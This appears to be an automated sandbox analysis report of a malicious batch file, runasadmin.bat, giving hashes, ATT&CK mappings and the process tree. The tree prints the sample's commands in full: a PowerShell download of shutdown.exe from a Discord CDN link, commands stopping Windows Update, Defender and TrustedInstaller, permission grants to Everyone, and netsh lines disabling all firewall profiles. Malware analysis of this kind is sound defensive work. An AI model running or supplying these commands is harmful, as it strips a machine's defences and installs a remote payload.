f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549

General

Target

runasadmin.bat
Size

1KB
MD5

27385fc8820b394db863c320f3bb48f2
SHA1

5c231e5d149ff97d8d435ef9442a41a94eecf716
SHA256

f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549
SHA512

66133441896602787b60e604962f181f06171d101765da80813a952636f245ace68d51971709f783749ee4f41ef9860912de82f5d87485c278635f6f82a802c0

Score

10^/10

discovery evasion execution exploit

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2300 powershell.exe
Modifies Windows Firewall 2 TTPs 7 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

1128 netsh.exe
2756 netsh.exe
2592 netsh.exe
2736 netsh.exe
564 netsh.exe
572 netsh.exe
1652 netsh.exe
Possible privilege escalation attempt 3 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exe

pid process

2160 takeown.exe
2752 icacls.exe
2584 icacls.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exe

pid process

2160 takeown.exe
2752 icacls.exe
2584 icacls.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

2728 sc.exe
2684 sc.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1728 timeout.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2300 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2300 powershell.exe

pid	process
2300	powershell.exe

pid	process
1128	netsh.exe
2756	netsh.exe
2592	netsh.exe
2736	netsh.exe
564	netsh.exe
572	netsh.exe
1652	netsh.exe

pid	process
2160	takeown.exe
2752	icacls.exe
2584	icacls.exe

pid	process
2160	takeown.exe
2752	icacls.exe
2584	icacls.exe

pid	process
2728	sc.exe
2684	sc.exe

pid	process
1728	timeout.exe

pid	process
2300	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2300	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1760 wrote to memory of 2300	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 2300	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 2300	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 2684	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2684	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2684	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2728	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2728	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2728	1760	cmd.exe	sc.exe
PID 1760 wrote to memory of 2576	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2576	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2576	1760	cmd.exe	net.exe
PID 2576 wrote to memory of 2776	2576	net.exe	net1.exe
PID 2576 wrote to memory of 2776	2576	net.exe	net1.exe
PID 2576 wrote to memory of 2776	2576	net.exe	net1.exe
PID 1760 wrote to memory of 2556	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2556	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2556	1760	cmd.exe	net.exe
PID 2556 wrote to memory of 2704	2556	net.exe	net1.exe
PID 2556 wrote to memory of 2704	2556	net.exe	net1.exe
PID 2556 wrote to memory of 2704	2556	net.exe	net1.exe
PID 1760 wrote to memory of 2160	1760	cmd.exe	takeown.exe
PID 1760 wrote to memory of 2160	1760	cmd.exe	takeown.exe
PID 1760 wrote to memory of 2160	1760	cmd.exe	takeown.exe
PID 1760 wrote to memory of 2752	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2752	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2752	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2584	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2584	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2584	1760	cmd.exe	icacls.exe
PID 1760 wrote to memory of 2460	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2460	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2460	1760	cmd.exe	net.exe
PID 2460 wrote to memory of 2772	2460	net.exe	net1.exe
PID 2460 wrote to memory of 2772	2460	net.exe	net1.exe
PID 2460 wrote to memory of 2772	2460	net.exe	net1.exe
PID 1760 wrote to memory of 2524	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2524	1760	cmd.exe	net.exe
PID 1760 wrote to memory of 2524	1760	cmd.exe	net.exe
PID 2524 wrote to memory of 2600	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2600	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2600	2524	net.exe	net1.exe
PID 1760 wrote to memory of 2756	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2756	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2756	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2592	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2592	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2592	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2736	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2736	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 2736	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 564	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 564	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 564	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 572	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 572	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 572	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1652	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1652	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1652	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1128	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1128	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1128	1760	cmd.exe	netsh.exe
PID 1760 wrote to memory of 1728	1760	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
2⤵
- Launches sc.exe
PID:2684

C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
2⤵
- Launches sc.exe
PID:2728

C:\Windows\system32\net.exe
net stop wuauserv
2⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
3⤵
PID:2776

C:\Windows\system32\net.exe
net stop TrustedInstaller
2⤵
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
3⤵
PID:2704

C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2160

C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2752

C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2584

C:\Windows\system32\net.exe
net stop "Windows Defender Service"
2⤵
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
3⤵
PID:2772

C:\Windows\system32\net.exe
net stop "Windows Firewall"
2⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
3⤵
PID:2600

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
2⤵
- Modifies Windows Firewall
PID:2756

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
2⤵
- Modifies Windows Firewall
PID:2592

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
2⤵
- Modifies Windows Firewall
PID:2736

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
2⤵
- Modifies Windows Firewall
PID:564

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
2⤵
- Modifies Windows Firewall
PID:572

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
2⤵
- Modifies Windows Firewall
PID:1652

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:1128

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
2⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2628

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

1

T1569

Service Execution

1

T1569.002

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Impair Defenses

1

T1562

Disable or Modify System Firewall

1

T1562.004

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2300-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

Filesize
4KB

Download
memory/2300-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-6-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/2300-8-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2300-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing